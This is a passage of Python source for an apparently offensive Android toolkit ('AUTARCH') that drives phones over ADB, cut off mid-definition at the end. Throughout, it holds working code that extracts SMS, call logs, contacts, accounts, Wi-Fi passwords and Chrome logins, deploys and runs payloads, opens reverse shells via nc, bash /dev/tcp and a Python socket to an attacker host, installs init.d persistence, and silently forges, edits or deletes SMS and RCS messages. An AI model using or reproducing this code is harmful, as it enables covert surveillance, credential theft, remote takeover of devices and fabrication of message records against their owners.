""" AUTARCH Android Exploitation Manager App extraction, device recon, payload deployment, boot/recovery exploits, rooting. Wraps HardwareManager for offensive Android operations. """ import os import re import json import time import sqlite3 import shutil from pathlib import Path from typing import Optional, List, Dict, Any from core.paths import get_data_dir from core.hardware import get_hardware_manager class AndroidExploitManager: """All Android exploitation logic.""" def __init__(self): self.hw = get_hardware_manager() self._base = get_data_dir() / 'android_exploit' for sub in ('apps', 'recon', 'payloads', 'boot', 'root'): (self._base / sub).mkdir(parents=True, exist_ok=True) def _serial_dir(self, category, serial): d = self._base / category / serial d.mkdir(parents=True, exist_ok=True) return d def _shell(self, serial, cmd, timeout=30): """Raw shell command (no safety filter).""" return self.hw.adb_shell_raw(serial, cmd, timeout=timeout) # ── App Extraction ─────────────────────────────────────────────── def list_packages(self, serial, include_system=False): """List installed packages. Returns [{package, path, is_system}].""" flag = '' if include_system else '-3' res = self._shell(serial, f'pm list packages -f {flag}') if res['returncode'] != 0: return {'error': res['output'], 'packages': []} packages = [] for line in res['output'].strip().split('\n'): line = line.strip() if not line.startswith('package:'): continue # Format: package:/data/app/com.example-1/base.apk=com.example rest = line[len('package:'):] if '=' in rest: path, pkg = rest.rsplit('=', 1) is_sys = path.startswith('/system') or path.startswith('/product') packages.append({'package': pkg, 'path': path, 'is_system': is_sys}) return {'packages': packages, 'count': len(packages)} def pull_apk(self, serial, package): """Pull APK for a package.""" # Get APK path res = self._shell(serial, f'pm path {package}') if res['returncode'] != 0 or not res['output'].strip(): return {'success': False, 'error': f'Cannot find path for {package}'} apk_path = res['output'].strip().replace('package:', '').split('\n')[0].strip() out_dir = self._serial_dir('apps', serial) local_path = str(out_dir / f'{package}.apk') result = self.hw.adb_pull(serial, apk_path, local_path) if result['success']: size = os.path.getsize(local_path) if os.path.exists(local_path) else 0 return {'success': True, 'local_path': local_path, 'size': size, 'remote_path': apk_path} return {'success': False, 'error': result.get('output', 'Pull failed')} def pull_app_data(self, serial, package): """Pull app data (databases, shared_prefs, files). Tries run-as then root.""" out_dir = self._serial_dir('apps', serial) / f'{package}_data' out_dir.mkdir(parents=True, exist_ok=True) pulled = [] # Try run-as first (debuggable apps) for subdir in ('databases', 'shared_prefs', 'files'): res = self._shell(serial, f'run-as {package} ls /data/data/{package}/{subdir}/ 2>/dev/null') if res['returncode'] == 0 and res['output'].strip(): for fname in res['output'].strip().split('\n'): fname = fname.strip() if not fname: continue remote = f'/data/data/{package}/{subdir}/{fname}' # Try run-as cat to pull cat_res = self._shell(serial, f'run-as {package} cat {remote}', timeout=15) if cat_res['returncode'] == 0: local_sub = out_dir / subdir local_sub.mkdir(exist_ok=True) local_file = local_sub / fname with open(local_file, 'w') as f: f.write(cat_res['output']) pulled.append(str(local_file)) # If run-as didn't work, try root if not pulled: for subdir in ('databases', 'shared_prefs', 'files'): res = self._shell(serial, f'su -c "ls /data/data/{package}/{subdir}/" 2>/dev/null') if res['returncode'] == 0 and res['output'].strip(): for fname in res['output'].strip().split('\n'): fname = fname.strip() if not fname: continue remote = f'/data/data/{package}/{subdir}/{fname}' tmp = f'/data/local/tmp/_exfil_{fname}' self._shell(serial, f'su -c "cp {remote} {tmp} && chmod 644 {tmp}"') local_sub = out_dir / subdir local_sub.mkdir(exist_ok=True) local_file = str(local_sub / fname) self.hw.adb_pull(serial, tmp, local_file) self._shell(serial, f'rm {tmp}') if os.path.exists(local_file): pulled.append(local_file) return {'success': len(pulled) > 0, 'files': pulled, 'output_dir': str(out_dir)} def extract_shared_prefs(self, serial, package): """Extract shared_prefs XML files for a package.""" res = self._shell(serial, f'run-as {package} ls /data/data/{package}/shared_prefs/ 2>/dev/null') if res['returncode'] != 0: # Try root res = self._shell(serial, f'su -c "ls /data/data/{package}/shared_prefs/" 2>/dev/null') if res['returncode'] != 0: return {'success': False, 'error': 'Cannot access shared_prefs (need debuggable app or root)'} prefs = {} for fname in res['output'].strip().split('\n'): fname = fname.strip() if not fname or not fname.endswith('.xml'): continue cat = self._shell(serial, f'run-as {package} cat /data/data/{package}/shared_prefs/{fname} 2>/dev/null') if cat['returncode'] != 0: cat = self._shell(serial, f'su -c "cat /data/data/{package}/shared_prefs/{fname}" 2>/dev/null') if cat['returncode'] == 0: prefs[fname] = cat['output'] return {'success': len(prefs) > 0, 'prefs': prefs, 'count': len(prefs)} # ── Device Recon ───────────────────────────────────────────────── def full_device_dump(self, serial): """Full device reconnaissance dump.""" dump = {} # All properties res = self._shell(serial, 'getprop', timeout=15) if res['returncode'] == 0: props = {} for line in res['output'].split('\n'): m = re.match(r'\[(.+?)\]:\s*\[(.+?)\]', line) if m: props[m.group(1)] = m.group(2) dump['properties'] = props # Key system info dump['device_info'] = self.hw.adb_device_info(serial) # SELinux status res = self._shell(serial, 'getenforce 2>/dev/null') dump['selinux'] = res['output'].strip() if res['returncode'] == 0 else 'unknown' # Kernel version res = self._shell(serial, 'uname -a') dump['kernel'] = res['output'].strip() if res['returncode'] == 0 else 'unknown' # Build fingerprint res = self._shell(serial, 'getprop ro.build.fingerprint') dump['fingerprint'] = res['output'].strip() if res['returncode'] == 0 else 'unknown' # Network info res = self._shell(serial, 'ip addr show 2>/dev/null || ifconfig') dump['network'] = res['output'].strip() if res['returncode'] == 0 else '' # Installed packages count res = self._shell(serial, 'pm list packages | wc -l') dump['package_count'] = res['output'].strip() if res['returncode'] == 0 else '0' # Running services res = self._shell(serial, 'dumpsys activity services | head -50', timeout=15) dump['services_sample'] = res['output'].strip() if res['returncode'] == 0 else '' return dump def get_accounts(self, serial): """Get accounts registered on device.""" res = self._shell(serial, 'dumpsys account 2>/dev/null', timeout=15) if res['returncode'] != 0: return {'success': False, 'error': res['output']} accounts = [] current = None for line in res['output'].split('\n'): line = line.strip() # Account {name=user@gmail.com, type=com.google} m = re.search(r'Account\s*\{name=(.+?),\s*type=(.+?)\}', line) if m: accounts.append({'name': m.group(1), 'type': m.group(2)}) # Deduplicate seen = set() unique = [] for a in accounts: key = f"{a['name']}:{a['type']}" if key not in seen: seen.add(key) unique.append(a) return {'success': True, 'accounts': unique, 'count': len(unique)} def get_wifi_passwords(self, serial): """Extract saved WiFi passwords. Requires ROOT.""" passwords = [] # Try newer Android (WifiConfigStore.xml) res = self._shell(serial, 'su -c "cat /data/misc/wifi/WifiConfigStore.xml" 2>/dev/null', timeout=15) if res['returncode'] == 0 and res['output'].strip(): ssid = None for line in res['output'].split('\n'): m = re.search(r'"SSID".*?"(.+?)"', line) if m: ssid = m.group(1).strip('"') m = re.search(r'"PreSharedKey".*?"(.+?)"', line) if m and ssid: passwords.append({'ssid': ssid, 'password': m.group(1).strip('"')}) ssid = None else: # Try older Android (wpa_supplicant.conf) res = self._shell(serial, 'su -c "cat /data/misc/wifi/wpa_supplicant.conf" 2>/dev/null', timeout=15) if res['returncode'] == 0: ssid = None for line in res['output'].split('\n'): line = line.strip() if line.startswith('ssid='): ssid = line.split('=', 1)[1].strip('"') elif line.startswith('psk=') and ssid: passwords.append({'ssid': ssid, 'password': line.split('=', 1)[1].strip('"')}) ssid = None if not passwords: return {'success': False, 'error': 'No WiFi passwords found (need root)', 'passwords': []} return {'success': True, 'passwords': passwords, 'count': len(passwords)} def extract_call_logs(self, serial, limit=200): """Extract call logs via content provider.""" res = self._shell(serial, f'content query --uri content://call_log/calls --projection number:type:date:duration --sort "date DESC" 2>/dev/null', timeout=15) if res['returncode'] != 0: return {'success': False, 'error': res['output'], 'calls': []} calls = [] type_map = {'1': 'incoming', '2': 'outgoing', '3': 'missed', '4': 'voicemail', '5': 'rejected'} for line in res['output'].split('\n'): if 'Row:' not in line: continue entry = {} for m in re.finditer(r'(\w+)=([^,\n]+)', line): entry[m.group(1)] = m.group(2).strip() if 'number' in entry: entry['type_label'] = type_map.get(entry.get('type', ''), 'unknown') calls.append(entry) if len(calls) >= limit: break return {'success': True, 'calls': calls, 'count': len(calls)} def extract_sms(self, serial, limit=200): """Extract SMS messages via content provider.""" res = self._shell(serial, f'content query --uri content://sms/ --projection address:body:date:type --sort "date DESC" 2>/dev/null', timeout=15) if res['returncode'] != 0: return {'success': False, 'error': res['output'], 'messages': []} messages = [] type_map = {'1': 'inbox', '2': 'sent', '3': 'draft'} for line in res['output'].split('\n'): if 'Row:' not in line: continue entry = {} for m in re.finditer(r'(\w+)=([^,\n]+)', line): entry[m.group(1)] = m.group(2).strip() if 'address' in entry: entry['type_label'] = type_map.get(entry.get('type', ''), 'unknown') messages.append(entry) if len(messages) >= limit: break return {'success': True, 'messages': messages, 'count': len(messages)} def extract_contacts(self, serial): """Extract contacts via content provider.""" res = self._shell(serial, 'content query --uri content://contacts/phones/ --projection display_name:number 2>/dev/null', timeout=15) if res['returncode'] != 0: return {'success': False, 'error': res['output'], 'contacts': []} contacts = [] for line in res['output'].split('\n'): if 'Row:' not in line: continue entry = {} for m in re.finditer(r'(\w+)=([^,\n]+)', line): entry[m.group(1)] = m.group(2).strip() if 'display_name' in entry or 'number' in entry: contacts.append(entry) return {'success': True, 'contacts': contacts, 'count': len(contacts)} def extract_browser_history(self, serial): """Pull Chrome History SQLite and query it locally. Requires ROOT.""" out_dir = self._serial_dir('recon', serial) remote = '/data/data/com.android.chrome/app_chrome/Default/History' tmp = '/data/local/tmp/_chrome_history' self._shell(serial, f'su -c "cp {remote} {tmp} && chmod 644 {tmp}"') local_path = str(out_dir / 'chrome_history.db') result = self.hw.adb_pull(serial, tmp, local_path) self._shell(serial, f'rm {tmp}') if not result['success'] or not os.path.exists(local_path): return {'success': False, 'error': 'Cannot pull Chrome history (need root)', 'history': []} history = [] try: conn = sqlite3.connect(local_path) cur = conn.cursor() cur.execute('SELECT url, title, visit_count, last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT 200') for row in cur.fetchall(): history.append({ 'url': row[0], 'title': row[1], 'visit_count': row[2], 'last_visit': row[3] }) conn.close() except Exception as e: return {'success': False, 'error': str(e), 'history': []} return {'success': True, 'history': history, 'count': len(history), 'db_path': local_path} def extract_saved_credentials(self, serial): """Pull Chrome Login Data SQLite. Requires ROOT.""" out_dir = self._serial_dir('recon', serial) remote = '/data/data/com.android.chrome/app_chrome/Default/Login Data' tmp = '/data/local/tmp/_chrome_logins' self._shell(serial, f'su -c "cp \'{remote}\' {tmp} && chmod 644 {tmp}"') local_path = str(out_dir / 'chrome_logins.db') result = self.hw.adb_pull(serial, tmp, local_path) self._shell(serial, f'rm {tmp}') if not result['success'] or not os.path.exists(local_path): return {'success': False, 'error': 'Cannot pull Login Data (need root)', 'credentials': []} creds = [] try: conn = sqlite3.connect(local_path) cur = conn.cursor() cur.execute('SELECT origin_url, username_value, password_value FROM logins') for row in cur.fetchall(): creds.append({ 'url': row[0], 'username': row[1], 'password_encrypted': bool(row[2]) }) conn.close() except Exception as e: return {'success': False, 'error': str(e), 'credentials': []} return {'success': True, 'credentials': creds, 'count': len(creds), 'db_path': local_path} def export_recon_report(self, serial): """Run all recon methods and save to JSON.""" out_dir = self._serial_dir('recon', serial) report = { 'serial': serial, 'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'), 'device_dump': self.full_device_dump(serial), 'accounts': self.get_accounts(serial), 'call_logs': self.extract_call_logs(serial), 'sms': self.extract_sms(serial), 'contacts': self.extract_contacts(serial), } report_path = str(out_dir / f'report_{int(time.time())}.json') with open(report_path, 'w') as f: json.dump(report, f, indent=2, default=str) return {'success': True, 'report_path': report_path, 'sections': list(report.keys())} # ── Payload Deployment ─────────────────────────────────────────── def deploy_binary(self, serial, local_path, remote_path='/data/local/tmp/'): """Push a binary and make it executable.""" if not os.path.isfile(local_path): return {'success': False, 'error': f'File not found: {local_path}'} fname = os.path.basename(local_path) if remote_path.endswith('/'): remote_full = remote_path + fname else: remote_full = remote_path result = self.hw.adb_push(serial, local_path, remote_full) if not result['success']: return {'success': False, 'error': result.get('output', 'Push failed')} self._shell(serial, f'chmod +x {remote_full}') return {'success': True, 'remote_path': remote_full} def execute_payload(self, serial, remote_path, args='', background=True): """Execute a deployed payload.""" if background: cmd = f'nohup {remote_path} {args} > /dev/null 2>&1 & echo $!' else: cmd = f'{remote_path} {args}' res = self._shell(serial, cmd, timeout=15) pid = res['output'].strip().split('\n')[-1].strip() if background else '' return { 'success': res['returncode'] == 0, 'output': res['output'], 'pid': pid, 'background': background, } def setup_reverse_shell(self, serial, lhost, lport, method='nc'): """Set up a reverse shell on device.""" if method == 'nc': cmd = f'nohup sh -c "nc {lhost} {lport} -e /system/bin/sh" > /dev/null 2>&1 &' elif method == 'bash': cmd = f'nohup sh -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1" > /dev/null 2>&1 &' elif method == 'python': py_cmd = (f"import socket,subprocess,os;" f"s=socket.socket();" f"s.connect(('{lhost}',{lport}));" f"os.dup2(s.fileno(),0);" f"os.dup2(s.fileno(),1);" f"os.dup2(s.fileno(),2);" f"subprocess.call(['/system/bin/sh','-i'])") cmd = f'nohup python -c "{py_cmd}" > /dev/null 2>&1 &' else: return {'success': False, 'error': f'Unknown method: {method}'} res = self._shell(serial, cmd, timeout=10) return { 'success': True, 'method': method, 'lhost': lhost, 'lport': lport, 'output': res['output'], } def install_persistence(self, serial, method='init.d'): """Install persistence mechanism. Requires ROOT.""" if method == 'init.d': script = '#!/system/bin/sh\n# AUTARCH persistence\n' # Write a minimal init.d script res = self._shell(serial, f'su -c "mkdir -p /system/etc/init.d && ' f'echo \'#!/system/bin/sh\' > /system/etc/init.d/99autarch && ' f'chmod 755 /system/etc/init.d/99autarch"') return { 'success': res['returncode'] == 0, 'method': method, 'path': '/system/etc/init.d/99autarch', 'output': res['output'], } return {'success': False, 'error': f'Unknown method: {method}'} def list_running_payloads(self, serial): """List processes in /data/local/tmp/.""" res = self._shell(serial, 'ps -ef 2>/dev/null || ps') if res['returncode'] != 0: return {'success': False, 'error': res['output'], 'payloads': []} payloads = [] for line in res['output'].split('\n'): if '/data/local/tmp/' in line: parts = line.split() if len(parts) >= 2: payloads.append({ 'pid': parts[1] if len(parts) > 1 else parts[0], 'command': line.strip(), }) return {'success': True, 'payloads': payloads, 'count': len(payloads)} def kill_payload(self, serial, pid): """Kill a running payload by PID.""" res = self._shell(serial, f'kill {pid} 2>/dev/null || su -c "kill {pid}"') return {'success': True, 'pid': pid, 'output': res['output']} # ── SMS Manipulation ───────────────────────────────────────────── def _with_sms_role(self, serial, am_cmd, timeout=15): """Execute a broadcast while Archon is temporarily the default SMS app. Swaps Archon into the SMS role, runs the broadcast, reads the result file, then restores the original default SMS app. Fully silent. """ # Check Archon is installed res = self._shell(serial, 'pm list packages com.darkhal.archon', timeout=5) if 'com.darkhal.archon' not in res.get('output', ''): return {'success': False, 'error': 'Archon companion app not installed'} # Get current default SMS app res = self._shell(serial, 'cmd role get-role-holders android.app.role.SMS', timeout=5) original_sms_app = '' if res['returncode'] == 0: out = res['output'].strip() # Output may be bare package name or [package] depending on Android version m = re.search(r'\[(.+?)\]', out) if m: original_sms_app = m.group(1) elif out and '.' in out: original_sms_app = out.split('\n')[0].strip() try: # Grant SMS permissions to Archon for perm in ['READ_SMS', 'SEND_SMS', 'RECEIVE_SMS']: self._shell(serial, f'pm grant com.darkhal.archon android.permission.{perm}', timeout=5) # Set Archon as default SMS app self._shell(serial, 'cmd role add-role-holder android.app.role.SMS com.darkhal.archon 0', timeout=5) # Clear previous result self._shell(serial, 'run-as com.darkhal.archon rm -f files/sms_result.txt', timeout=5) # Send the broadcast self._shell(serial, am_cmd, timeout=10) # Wait for receiver to process time.sleep(0.5) # Read result res = self._shell(serial, 'run-as com.darkhal.archon cat files/sms_result.txt', timeout=5) result_text = res.get('output', '').strip() if result_text.startswith('SUCCESS:'): return {'success': True, 'detail': result_text[8:]} elif result_text.startswith('FAIL:') or result_text.startswith('ERROR:'): return {'success': False, 'error': result_text} else: return {'success': False, 'error': f'No result from Archon (got: {result_text or "empty"})'} finally: # Always restore original default SMS app if original_sms_app and original_sms_app != 'com.darkhal.archon': self._shell(serial, f'cmd role add-role-holder android.app.role.SMS' f' {original_sms_app} 0', timeout=5) def _sms_max_id(self, serial): """Get the current maximum _id in the SMS table (for verifying inserts).""" res = self._shell(serial, 'content query --uri content://sms/ --projection _id' ' --sort "_id DESC LIMIT 1"', timeout=5) if res['returncode'] == 0: m = re.search(r'_id=(\d+)', res['output']) if m: return int(m.group(1)) return 0 def _sms_row_exists(self, serial, sms_id): """Check if a specific SMS _id exists.""" res = self._shell(serial, f'content query --uri content://sms/{sms_id} --projection _id', timeout=5) return res['returncode'] == 0 and '_id=' in res.get('output', '') def sms_list(self, serial, limit=50, address=None): """List SMS messages on device. Optional filter by address (phone number).""" proj = '_id:address:body:date:type:read' cmd = f'content query --uri content://sms/ --projection {proj} --sort "date DESC"' res = self._shell(serial, cmd, timeout=15) if res['returncode'] != 0: return {'success': False, 'error': res['output'], 'messages': []} type_map = {'1': 'inbox', '2': 'sent', '3': 'draft', '4': 'outbox'} messages = [] for line in res['output'].split('\n'): if 'Row:' not in line: continue entry = {} for m in re.finditer(r'(\w+)=([^,\n]+)', line): entry[m.group(1)] = m.group(2).strip() if '_id' not in entry: continue if address and entry.get('address', '') != address: continue entry['type_label'] = type_map.get(entry.get('type', ''), 'unknown') # Convert epoch ms to readable try: ts = int(entry.get('date', 0)) if ts > 0: entry['date_readable'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts / 1000)) except (ValueError, OSError): pass messages.append(entry) if len(messages) >= limit: break return {'success': True, 'messages': messages, 'count': len(messages)} def sms_insert(self, serial, address, body, date_str=None, time_str=None, msg_type='inbox', read=True): """Insert a spoofed SMS message. Args: address: Phone number (sender for inbox, recipient for sent) body: Message text date_str: Date as YYYY-MM-DD (default: now) time_str: Time as HH:MM:SS (default: now) msg_type: 'inbox' (1), 'sent' (2), 'draft' (3) read: Mark as read """ type_map = {'inbox': 1, 'sent': 2, 'draft': 3, 'outbox': 4, '1': 1, '2': 2, '3': 3, '4': 4} type_val = type_map.get(str(msg_type), 1) # Build epoch milliseconds from date + time if date_str or time_str: dt_str = f"{date_str or time.strftime('%Y-%m-%d')} {time_str or time.strftime('%H:%M:%S')}" try: ts = time.mktime(time.strptime(dt_str, '%Y-%m-%d %H:%M:%S')) date_ms = int(ts * 1000) except ValueError: return {'success': False, 'error': f'Invalid date/time: {dt_str}'} else: date_ms = int(time.time() * 1000) # Try enabling WRITE_SMS appop for shell (helps on Android 10-12) self._shell(serial, 'appops set com.android.shell WRITE_SMS allow', timeout=5) # Snapshot max _id before insert to verify afterwards old_max = self._sms_max_id(serial) body_escaped = body.replace("'", "'\\''") cmd = ( f"content insert --uri content://sms/" f" --bind address:s:'{address}'" f" --bind body:s:'{body_escaped}'" f" --bind date:l:{date_ms}" f" --bind type:i:{type_val}" f" --bind read:i:{1 if read else 0}" f" --bind seen:i:1" ) res = self._shell(serial, cmd, timeout=10) if res['returncode'] == 0: # Verify the insert actually created a row (Android 10+ silently drops) new_max = self._sms_max_id(serial) if new_max > old_max: date_readable = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(date_ms / 1000)) return { 'success': True, 'address': address, 'body': body, 'date': date_readable, 'date_ms': date_ms, 'type': msg_type, } # Direct insert failed (silently rejected) — use Archon app as SMS role proxy body_escaped = body.replace("'", "'\\''") am_cmd = ( f"am broadcast -a com.darkhal.archon.SMS_INSERT" f" -n com.darkhal.archon/.service.SmsWorker" f" --es address '{address}'" f" --es body '{body_escaped}'" f" --el date {date_ms}" f" --ei type {type_val}" f" --ei read {1 if read else 0}" ) archon = self._with_sms_role(serial, am_cmd) if archon.get('success'): date_readable = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(date_ms / 1000)) return { 'success': True, 'address': address, 'body': body, 'date': date_readable, 'date_ms': date_ms, 'type': msg_type, 'method': 'archon_proxy', } return {'success': False, 'error': archon.get('error', 'SMS insert failed')} def sms_delete(self, serial, sms_id=None, address=None, delete_all_from=False): """Delete SMS messages. Args: sms_id: Delete specific message by _id address: Delete messages from/to this number delete_all_from: If True and address set, delete ALL from that number """ # Enable WRITE_SMS appop (helps on Android 10-12) self._shell(serial, 'appops set com.android.shell WRITE_SMS allow', timeout=5) if sms_id: if not self._sms_row_exists(serial, sms_id): return {'success': False, 'error': f'SMS #{sms_id} not found'} cmd = f'content delete --uri content://sms/{sms_id}' res = self._shell(serial, cmd, timeout=10) if res['returncode'] == 0 and not self._sms_row_exists(serial, sms_id): return {'success': True, 'deleted_id': sms_id} return { 'success': False, 'error': ('SMS provider rejected delete — Android 10+ restricts ' 'SMS database writes to the default SMS app.'), } elif address and delete_all_from: cmd = f"content delete --uri content://sms/ --where \"address='{address}'\"" res = self._shell(serial, cmd, timeout=10) return { 'success': res['returncode'] == 0, 'deleted_address': address, 'output': res['output'], } return {'success': False, 'error': 'Provide sms_id or address with delete_all_from=True'} def sms_delete_all(self, serial): """Delete ALL SMS messages on the device.""" cmd = 'content delete --uri content://sms/' res = self._shell(serial, cmd, timeout=15) return {'success': res['returncode'] == 0, 'output': res['output']} def sms_update(self, serial, sms_id, body=None, date_str=None, time_str=None, address=None, msg_type=None, read=None): """Update an existing SMS message fields.""" self._shell(serial, 'appops set com.android.shell WRITE_SMS allow', timeout=5) if not self._sms_row_exists(serial, sms_id): return {'success': False, 'error': f'SMS #{sms_id} not found'} binds = [] if body is not None: body_escaped = body.replace("'", "'\\''") binds.append(f"--bind body:s:'{body_escaped}'") if address is not None: binds.append(f"--bind address:s:'{address}'") if msg_type is not None: type_map = {'inbox': 1, 'sent': 2, 'draft': 3, '1': 1, '2': 2, '3': 3} binds.append(f"--bind type:i:{type_map.get(str(msg_type), 1)}") if read is not None: binds.append(f"--bind read:i:{1 if read else 0}") if date_str or time_str: dt_str = f"{date_str or time.strftime('%Y-%m-%d')} {time_str or time.strftime('%H:%M:%S')}" try: ts = time.mktime(time.strptime(dt_str, '%Y-%m-%d %H:%M:%S')) binds.append(f"--bind date:l:{int(ts * 1000)}") except ValueError: return {'success': False, 'error': f'Invalid date/time: {dt_str}'} if not binds: return {'success': False, 'error': 'Nothing to update'} cmd = f"content update --uri content://sms/{sms_id} {' '.join(binds)}" res = self._shell(serial, cmd, timeout=10) # Verify update took effect by reading the row back updated = False if res['returncode'] == 0 and body is not None: verify = self._shell(serial, f'content query --uri content://sms/{sms_id}' f' --projection body', timeout=5) if verify['returncode'] == 0 and body in verify.get('output', ''): updated = True elif res['returncode'] == 0 and body is None: updated = True # non-body updates harder to verify, trust return code if updated: return {'success': True, 'id': sms_id, 'output': 'SMS updated'} # Direct update failed — use Archon app as SMS role proxy extras = [f"--es id '{sms_id}'"] if body is not None: body_escaped = body.replace("'", "'\\''") extras.append(f"--es body '{body_escaped}'") if address is not None: extras.append(f"--es address '{address}'") if msg_type is not None: type_map_r = {'inbox': 1, 'sent': 2, 'draft': 3, '1': 1, '2': 2, '3': 3} extras.append(f"--ei type {type_map_r.get(str(msg_type), 1)}") if read is not None: extras.append(f"--ei read {1 if read else 0}") if date_str or time_str: dt_str = f"{date_str or time.strftime('%Y-%m-%d')} {time_str or time.strftime('%H:%M:%S')}" try: ts = time.mktime(time.strptime(dt_str, '%Y-%m-%d %H:%M:%S')) extras.append(f"--el date {int(ts * 1000)}") except ValueError: pass am_cmd = ( f"am broadcast -a com.darkhal.archon.SMS_UPDATE" f" -n com.darkhal.archon/.service.SmsWorker" f" {' '.join(extras)}" ) archon = self._with_sms_role(serial, am_cmd) if archon.get('success'): return {'success': True, 'id': sms_id, 'output': 'SMS updated via Archon'} return {'success': False, 'error': archon.get('error', 'SMS update failed')} def sms_bulk_insert(self, serial, messages): """Insert multiple SMS messages. Args: messages: List of dicts with keys: address, body, date, time, type, read """ results = [] for msg in messages: r = self.sms_insert( serial, address=msg.get('address', ''), body=msg.get('body', ''), date_str=msg.get('date'), time_str=msg.get('time'), msg_type=msg.get('type', 'inbox'), read=msg.get('read', True), ) results.append(r) success_count = sum(1 for r in results if r.get('success')) return {'success': success_count > 0, 'total': len(messages), 'inserted': success_count, 'results': results} # ── RCS Spoofing ───────────────────────────────────────────────── def rcs_check_support(self, serial): """Check if Google Messages / RCS is available on device.""" info = {'rcs_available': False, 'messaging_app': None, 'database': None} # Check for Google Messages res = self._shell(serial, 'pm list packages | grep com.google.android.apps.messaging') if res['returncode'] == 0 and 'messaging' in res['output']: info['messaging_app'] = 'com.google.android.apps.messaging' info['rcs_available'] = True else: # Check default messaging res = self._shell(serial, 'pm list packages | grep com.android.messaging') if res['returncode'] == 0: info['messaging_app'] = 'com.android.messaging' # Check for bugle_db db_paths = [ '/data/data/com.google.android.apps.messaging/databases/bugle_db', '/data/user/0/com.google.android.apps.messaging/databases/bugle_db', ] for db in db_paths: res = self._shell(serial, f'su -c "ls {db}" 2>/dev/null') if res['returncode'] == 0 and res['output'].strip(): info['database'] = db break return info def rcs_list(self, serial, limit=50): """List RCS messages from Google Messages bugle_db. Requires ROOT.""" check = self.rcs_check_support(serial) if not check.get('database'): return {'success': False, 'error': 'Google Messages database not found (need root)', 'messages': [], 'rcs_info': check} out_dir = self._serial_dir('recon', serial) db_remote = check['database'] tmp = '/data/local/tmp/_bugle_db' self._shell(serial, f'su -c "cp {db_remote} {tmp} && chmod 644 {tmp}"') local_db = str(out_dir / 'bugle_db') result = self.hw.adb_pull(serial, tmp, local_db) self._shell(serial, f'rm {tmp}') if not result['success'] or not os.path.exists(local_db): return {'success': False, 'error': 'Failed to pull bugle_db', 'messages': []} messages = [] try: conn = sqlite3.connect(local_db) cur = conn.cursor() # Get messages with conversation and participant info cur.execute(''' SELECT m.message_id, m.conversation_id, m.received_timestamp, m.message_status, m.message_protocol, p.text, p.content_type, c.name AS conv_name FROM messages m LEFT JOIN parts p ON m._id = p.message_id LEFT JOIN conversations c ON m.conversation_id = c._id ORDER BY m.received_timestamp DESC LIMIT ? ''', (limit,)) for row in cur.fetchall(): proto = row[4] or 0 messages.append({ 'message_id': row[0], 'conversation_id': row[1], 'timestamp': row[2], 'timestamp_readable': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(row[2] / 1000)) if row[2] else '', 'status': row[3], 'protocol': 'RCS' if proto == 1 else 'SMS' if proto == 0 else f'proto_{proto}', 'text': row[5] or '', 'content_type': row[6] or 'text/plain', 'conversation_name': row[7] or '', }) conn.close() except Exception as e: return {'success': False, 'error': f'Database query failed: {e}', 'messages': []} return {'success': True, 'messages': messages, 'count': len(messages), 'db_path': local_db} def rcs_insert(self, serial, address, body, date_str=None, time_str=None, sender_name=None, is_outgoing=False): """Insert a spoofed RCS message into Google Messages bugle_db. Requires ROOT. This pulls the database, inserts locally, then pushes back. The messaging app must be force-stopped before and restarted after. """ check = self.rcs_check_support(serial) if not check.get('database'): return {'success': False, 'error': 'Google Messages database not found (need root)'} out_dir = self._serial_dir('recon', serial) db_remote = check['database'] pkg = check['messaging_app'] tmp = '/data/local/tmp/_bugle_db_rw' # Build timestamp if date_str or time_str: dt_str = f"{date_str or time.strftime('%Y-%m-%d')} {time_str or time.strftime('%H:%M:%S')}" try: ts = time.mktime(time.strptime(dt_str, '%Y-%m-%d %H:%M:%S')) date_ms = int(ts * 1000) except ValueError: return {'success': False, 'error': f'Invalid date/time: {dt_str}'} else: date_ms = int(time.time() * 1000) # Force-stop messaging app self._shell(serial, f'am force-stop {pkg}') time.sleep(0.5) # Copy database to temp location self._shell(serial, f'su -c "cp {db_remote} {tmp} && cp {db_remote}-journal {tmp}-journal 2>/dev/null; chmod 666 {tmp} {tmp}-journal 2>/dev/null"') # Pull local_db = str(out_dir / 'bugle_db_rw') result = self.hw.adb_pull(serial, tmp, local_db) if not result['success']: return {'success': False, 'error': 'Failed to pull database'} try: conn = sqlite3.connect(local_db) cur = conn.cursor() # Find or create conversation for this address cur.execute('SELECT _id FROM conversations WHERE name = ? OR other_participant_normalized_destination = ? LIMIT 1', (address, address)) row = cur.fetchone() if row: conv_id = row[0] else: # Create new conversation cur.execute(''' INSERT INTO conversations ( name, other_participant_normalized_destination, latest_message_id, sort_timestamp, sms_thread_id, current_self_id ) VALUES (?, ?, NULL, ?, -1, '1') ''', (sender_name or address, address, date_ms)) conv_id = cur.lastrowid # Determine message direction: 0=incoming, 1=outgoing (varies by schema) # status: 2=complete for outgoing, 0=complete for incoming if is_outgoing: status = 2 sent_ts = date_ms recv_ts = 0 else: status = 0 sent_ts = 0 recv_ts = date_ms # Insert message — protocol 1 = RCS cur.execute(''' INSERT INTO messages ( conversation_id, sender_participant_id, sent_timestamp, received_timestamp, message_status, message_protocol, message_seen, read ) VALUES (?, ?, ?, ?, ?, 1, 1, 1) ''', (conv_id, '1' if is_outgoing else '0', sent_ts, recv_ts, status)) msg_row_id = cur.lastrowid # Insert message text as part cur.execute(''' INSERT INTO parts ( message_id, text, content_type ) VALUES (?, ?, 'text/plain') ''', (msg_row_id, body)) # Update conversation timestamp cur.execute(''' UPDATE conversations SET sort_timestamp = ?, latest_message_id = ? WHERE _id = ? ''', (date_ms, msg_row_id, conv_id)) conn.commit() conn.close() except Exception as e: return {'success': False, 'error': f'Database insert failed: {e}'} # Push modified database back self.hw.adb_push(serial, local_db, tmp) # Copy back to app directory with correct ownership self._shell(serial, f'su -c "cp {tmp} {db_remote} && chown $(stat -c %u:%g {db_remote}) {db_remote} 2>/dev/null"') self._shell(serial, f'rm {tmp} {tmp}-journal 2>/dev/null') # Restart messaging app self._shell(serial, f'monkey -p {pkg} -c android.intent.category.LAUNCHER 1 2>/dev/null') date_readable = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(date_ms / 1000)) return { 'success': True, 'address': address, 'body': body, 'date': date_readable, 'date_ms': date_ms, 'protocol': 'RCS', 'conversation_id': conv_id, 'is_outgoing': is_outgoing, } def 